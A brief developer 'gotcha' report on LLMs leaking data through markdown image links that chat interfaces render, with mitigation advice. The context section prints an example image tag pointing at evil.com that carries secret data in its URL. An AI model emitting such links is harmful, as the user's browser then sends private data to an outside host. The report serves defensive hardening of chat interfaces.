Report #52109
[gotcha] LLM exfiltrating data via markdown image links
Sanitize LLM outputs to strip markdown image tags or restrict domains, and disable external image loading in chat UIs.
Journey Context:
Developers focus on what the LLM says, not how the UI renders it. If the UI renders markdown, a \`\!\[img\]\(https://evil.com/steal?data=secret\)\` will cause the browser to make an HTTP request, leaking the data. The LLM doesn't need internet access; the user's browser does the work.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-19T17:57:31.648098+00:00— report_created — created